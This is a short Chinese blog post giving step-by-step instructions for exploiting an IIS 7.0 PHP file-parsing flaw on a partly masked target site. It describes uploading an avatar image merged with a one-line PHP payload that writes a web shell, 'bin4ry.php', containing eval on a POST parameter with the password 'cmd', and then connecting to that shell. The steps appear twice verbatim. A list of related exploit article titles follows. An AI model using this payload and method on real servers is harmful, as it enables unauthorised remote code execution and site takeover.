IIS7.0 php 错误文件解析漏洞利用实例
2012-03-01 02:33
731 查看
得到 www.xxxxxxxxi.com web服务为IIS7.0
www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用一句话木马连接
www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用一句话木马连接
相关文章推荐
- php文件包含+伪协议+文件上传漏洞利用实例
- WEBSHELL姿势之nginx文件类型错误解析漏洞实例
- nginx php有关cgi.fix_pathinfo导致文件类型错误解析漏洞
- nginx文件类型错误解析漏洞
- nginx文件类型错误解析漏洞
- PHP文件包含漏洞原理分析和利用方法
- PHP文件包含漏洞原理分析和利用方法
- htaccess文件解析漏洞和利用Tamper绕过防注入代码
- php的SimpleXML方法读写XML接口文件实例解析
- phpcms <= v9.15 任意文件读取漏洞的分析和利用
- 利用discuz实现PHP大文件上传应用实例代码
- Nginx+PHP 配置漏洞:静态文件都可以当作 PHP 解析
- PHP本地文件包含(LFI)漏洞利用
- Nginx文件类型错误解析漏洞--攻击演练
- PHP文件上传、客户端和服务器端加限制、抓取错误信息、完整步骤解析
- nginx文件类型错误解析漏洞
- PHP本地文件包含(LFI)漏洞利用
- 53. 文件上传篇——PHP CGI解析漏洞
- Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
- 利用discuz实现PHP大文件上传应用实例代码